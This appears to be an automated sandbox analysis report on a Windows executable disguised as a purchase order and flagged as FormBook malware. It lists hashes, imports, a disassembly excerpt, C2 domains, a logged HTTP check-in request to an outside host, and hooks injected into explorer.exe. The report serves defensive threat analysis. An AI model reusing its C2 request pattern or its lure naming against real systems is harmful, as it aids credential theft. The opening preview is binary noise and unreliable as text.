                                                          Preview:..|..25VK...@...z.W[...a:@..VKOM8IVXV3FMWXX7DI9H625VKOM8IV.V3FCH.V7.@.i.3y.j.%Q:v($\!?65xT%'W'B.W3k=8Vi?6vw..w57S!g4E<.5VKOM8I..^..1."...P..V.../.V....>..D....T..",%..0.V3FMWXX7DI9H625V..M8.WYV.$.XX7DI9H6.5TJDL2IV.T3FMWXX7DII.725FKOM.KVXVsFMGXX7FI9M635VKOM=IWXV3FMW.Z7DK9H625VIO..IVHV3VMWXX'DI)H625VK_M8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9fBWM"KOM.TXV#FMW.Z7DY9H625VKOM8IVXV.FM7XX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM8IVXV3FMWXX7DI9H625VKOM

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.212908697725054
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:Purchase order MIPO2425110032.exe
                                                          File size:1'312'891 bytes
                                                          MD5:85c1c3e112a22e4f23eaf97d86fef355
                                                          SHA1:4922c4f1c57d740ad9f7d46bba1b18f8744277db
                                                          SHA256:88e7becf09f33e1db8fe108dbe9687a13bf1225ecf322a00f2e67b86a8931813
                                                          SHA512:80929585d61a0af38166c0d6b94bcc852dc05025537ec9915441ef78f270cf4759ea05f28604f63f8193e31474d6e88a81aabe725c24a8cb839cf9e1fa560f0b
                                                          SSDEEP:24576:mRmJkcoQricOIQxiZY1iaI9tlv4ngXMKFXV7KeTFjt84:jJZoQrbTFZY1iaI/N4gXMKJV7Kv4
                                                          TLSH:5855CF11AC8C9466C1622173DE3AF77A96346D26137791EB37C85E3729B03C25B3A336
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                          File Icon

                                                          Icon Hash:c58ee08c9594cd55

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4165c1
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:0
                                                          File Version Major:5
                                                          File Version Minor:0
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:0
                                                          Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007F42E0BCA75Bh
                                                          jmp 00007F42E0BC15CEh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [ebp+0Ch]
                                                          mov ecx, dword ptr [ebp+10h]
                                                          mov edi, dword ptr [ebp+08h]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007F42E0BC174Ah
                                                          cmp edi, eax
                                                          jc 00007F42E0BC18E6h
                                                          cmp ecx, 00000080h
                                                          jc 00007F42E0BC175Eh
                                                          cmp dword ptr [004A9724h], 00000000h
                                                          je 00007F42E0BC1755h
                                                          push edi
                                                          push esi
                                                          and edi, 0Fh
                                                          and esi, 0Fh
                                                          cmp edi, esi
                                                          pop esi
                                                          pop edi
                                                          jne 00007F42E0BC1747h
                                                          jmp 00007F42E0BC1B22h
                                                          test edi, 00000003h
                                                          jne 00007F42E0BC1756h
                                                          shr ecx, 02h
                                                          and edx, 03h
                                                          cmp ecx, 08h
                                                          jc 00007F42E0BC176Bh
                                                          rep movsd
                                                          jmp dword ptr [00416740h+edx*4]
                                                          mov eax, edi
                                                          mov edx, 00000003h
                                                          sub ecx, 04h
                                                          jc 00007F42E0BC174Eh
                                                          and eax, 03h
                                                          add ecx, eax
                                                          jmp dword ptr [00416654h+eax*4]
                                                          jmp dword ptr [00416750h+ecx*4]
                                                          nop
                                                          jmp dword ptr [004166D4h+ecx*4]
                                                          nop
                                                          inc cx
                                                          add byte ptr [eax-4BFFBE9Ah], dl
                                                          inc cx
                                                          add byte ptr [ebx], ah
                                                          ror dword ptr [edx-75F877FAh], 1
                                                          inc esi
                                                          add dword ptr [eax+468A0147h], ecx
                                                          add al, cl
                                                          jmp 00007F42E3039F47h
                                                          add esi, 03h
                                                          add edi, 03h
                                                          cmp ecx, 08h
                                                          jc 00007F42E0BC170Eh
                                                          rep movsd
                                                          jmp dword ptr [00000000h+edx*4]

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ C ] VS2010 SP1 build 40219
                                                          • [C++] VS2010 SP1 build 40219
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2010 SP1 build 40219
                                                          • [RES] VS2010 SP1 build 40219
                                                          • [LNK] VS2010 SP1 build 40219

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x3a818.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0xab0000x3a8180x3aa00ca10a7d76f98eb421efae1a9194d40a8False0.31944213086353945data5.766607496882607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xab7480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.5150709219858156
                                                          RT_ICON0xabbb00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                          RT_ICON0xabcd80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                          RT_ICON0xabe000x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                          RT_ICON0xabf280x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.37682926829268293
                                                          RT_ICON0xac5900x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.478494623655914
                                                          RT_ICON0xac8780x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishGreat Britain0.514344262295082
                                                          RT_ICON0xaca600x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.49324324324324326
                                                          RT_ICON0xacb880x6ed1PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9985195107335472
                                                          RT_ICON0xb3a600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.570362473347548
                                                          RT_ICON0xb49080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.6430505415162455
                                                          RT_ICON0xb51b00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishGreat Britain0.5616359447004609
                                                          RT_ICON0xb58780x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.4125722543352601
                                                          RT_ICON0xb5de00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.13950668401750857
                                                          RT_ICON0xc66080x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain0.22774332562539415
                                                          RT_ICON0xcfab00x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishGreat Britain0.23240601503759398
                                                          RT_ICON0xd62980x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain0.25914972273567466
                                                          RT_ICON0xdb7200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.24728389230042513
                                                          RT_ICON0xdf9480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.3354771784232365
                                                          RT_ICON0xe1ef00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.3778142589118199
                                                          RT_MENU0xe2f980x50dataEnglishGreat Britain0.9
                                                          RT_DIALOG0xe2fe80xfcdataEnglishGreat Britain0.6507936507936508
                                                          RT_STRING0xe30e80x530dataEnglishGreat Britain0.33960843373493976
                                                          RT_STRING0xe36180x690dataEnglishGreat Britain0.26964285714285713
                                                          RT_STRING0xe3ca80x4d0dataEnglishGreat Britain0.36363636363636365
                                                          RT_STRING0xe41780x5fcdataEnglishGreat Britain0.3087467362924282
                                                          RT_STRING0xe47780x65cdataEnglishGreat Britain0.34336609336609336
                                                          RT_STRING0xe4dd80x388dataEnglishGreat Britain0.377212389380531
                                                          RT_STRING0xe51600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                          RT_GROUP_ICON0xe52b80x102dataEnglishGreat Britain0.6162790697674418
                                                          RT_GROUP_ICON0xe53c00x14dataEnglishGreat Britain1.15
                                                          RT_GROUP_ICON0xe53d80x14dataEnglishGreat Britain1.25
                                                          RT_GROUP_ICON0xe53f00x14dataEnglishGreat Britain1.25
                                                          RT_VERSION0xe54080x19cdataEnglishGreat Britain0.5339805825242718
                                                          RT_MANIFEST0xe55a80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                          Imports

                                                          DLLImport
                                                          WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                          VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                          COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                          MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                          PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                          USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                          KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                          USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                          GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                          ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                          ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                          OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishGreat Britain
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-11-04T15:28:16.536065+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.549704TCP
                                                          2024-11-04T15:28:55.195375+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.549895TCP
                                                          2024-11-04T15:29:02.927018+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549943156.235.1.3080TCP
                                                          2024-11-04T15:29:02.927018+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549943156.235.1.3080TCP
                                                          2024-11-04T15:29:02.927018+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549943156.235.1.3080TCP
                                                          2024-11-04T15:30:04.960785+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549977199.59.243.22780TCP
                                                          2024-11-04T15:30:04.960785+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549977199.59.243.22780TCP
                                                          2024-11-04T15:30:04.960785+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549977199.59.243.22780TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 4, 2024 15:29:02.248311043 CET4994380192.168.2.5156.235.1.30
                                                          Nov 4, 2024 15:29:02.253279924 CET8049943156.235.1.30192.168.2.5
                                                          Nov 4, 2024 15:29:02.253354073 CET4994380192.168.2.5156.235.1.30
                                                          Nov 4, 2024 15:29:02.253401041 CET4994380192.168.2.5156.235.1.30
                                                          Nov 4, 2024 15:29:02.258485079 CET8049943156.235.1.30192.168.2.5
                                                          Nov 4, 2024 15:29:02.751633883 CET4994380192.168.2.5156.235.1.30
                                                          Nov 4, 2024 15:29:02.800196886 CET8049943156.235.1.30192.168.2.5
                                                          Nov 4, 2024 15:29:02.926904917 CET8049943156.235.1.30192.168.2.5
                                                          Nov 4, 2024 15:29:02.927017927 CET4994380192.168.2.5156.235.1.30

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 4, 2024 15:28:41.628223896 CET5224253192.168.2.51.1.1.1
                                                          Nov 4, 2024 15:28:41.650876999 CET53522421.1.1.1192.168.2.5
                                                          Nov 4, 2024 15:29:01.861790895 CET6194353192.168.2.51.1.1.1
                                                          Nov 4, 2024 15:29:02.247543097 CET53619431.1.1.1192.168.2.5
                                                          Nov 4, 2024 15:29:22.800858974 CET6503553192.168.2.51.1.1.1
                                                          Nov 4, 2024 15:29:22.895337105 CET53650351.1.1.1192.168.2.5
                                                          Nov 4, 2024 15:29:42.926250935 CET6253553192.168.2.51.1.1.1
                                                          Nov 4, 2024 15:29:43.019112110 CET53625351.1.1.1192.168.2.5
                                                          Nov 4, 2024 15:30:04.415518999 CET6397053192.168.2.51.1.1.1
                                                          Nov 4, 2024 15:30:04.455940008 CET53639701.1.1.1192.168.2.5

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Nov 4, 2024 15:28:41.628223896 CET192.168.2.51.1.1.10x6adfStandard query (0)www.sfmoreservicesllc.latA (IP address)IN (0x0001)false
                                                          Nov 4, 2024 15:29:01.861790895 CET192.168.2.51.1.1.10x7293Standard query (0)www.6282.xyzA (IP address)IN (0x0001)false
                                                          Nov 4, 2024 15:29:22.800858974 CET192.168.2.51.1.1.10x62b0Standard query (0)www.ostcanadantpl.topA (IP address)IN (0x0001)false
                                                          Nov 4, 2024 15:29:42.926250935 CET192.168.2.51.1.1.10x71cfStandard query (0)www.rkgexg.topA (IP address)IN (0x0001)false
                                                          Nov 4, 2024 15:30:04.415518999 CET192.168.2.51.1.1.10x47ccStandard query (0)www.9net88.netA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Nov 4, 2024 15:28:41.650876999 CET1.1.1.1192.168.2.50x6adfName error (3)www.sfmoreservicesllc.latnonenoneA (IP address)IN (0x0001)false
                                                          Nov 4, 2024 15:29:02.247543097 CET1.1.1.1192.168.2.50x7293No error (0)www.6282.xyz156.235.1.30A (IP address)IN (0x0001)false
                                                          Nov 4, 2024 15:29:22.895337105 CET1.1.1.1192.168.2.50x62b0Name error (3)www.ostcanadantpl.topnonenoneA (IP address)IN (0x0001)false
                                                          Nov 4, 2024 15:29:43.019112110 CET1.1.1.1192.168.2.50x71cfName error (3)www.rkgexg.topnonenoneA (IP address)IN (0x0001)false
                                                          Nov 4, 2024 15:30:04.455940008 CET1.1.1.1192.168.2.50x47ccNo error (0)www.9net88.net94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                          Nov 4, 2024 15:30:04.455940008 CET1.1.1.1192.168.2.50x47ccNo error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.6282.xyz

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.549943156.235.1.30801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 4, 2024 15:29:02.253401041 CET166OUTGET /ge07/?VN9H=FOymHjEy8INtRP80ztKDHy+SkTRNuxtAsSGbgkPqAuR0sH6nXW9AVXeVOt+ErvTzet/o&H0Gx7d=DzrdohnPa4vXCBq HTTP/1.1
                                                          Host: www.6282.xyz
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:


                                                          Code Manipulations

                                                          User Modules

                                                          Hook Summary

                                                          Function NameHook TypeActive in Processes
                                                          PeekMessageAINLINEexplorer.exe
                                                          PeekMessageWINLINEexplorer.exe
                                                          GetMessageWINLINEexplorer.exe
                                                          GetMessageAINLINEexplorer.exe

                                                          Processes

                                                          Process: explorer.exe, Module: user32.dll
                                                          Function NameHook TypeNew Data
                                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE0
                                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE0
                                                          GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE0
                                                          GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE0

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:09:27:56
                                                          Start date:04/11/2024
                                                          Path:C:\Users\user\Desktop\Purchase order MIPO2425110032.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Purchase order MIPO2425110032.exe"
                                                          Imagebase:0x400000
                                                          File size:1'312'891 bytes
                                                          MD5 hash:85C1C3E112A22E4F23EAF97D86FEF355
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
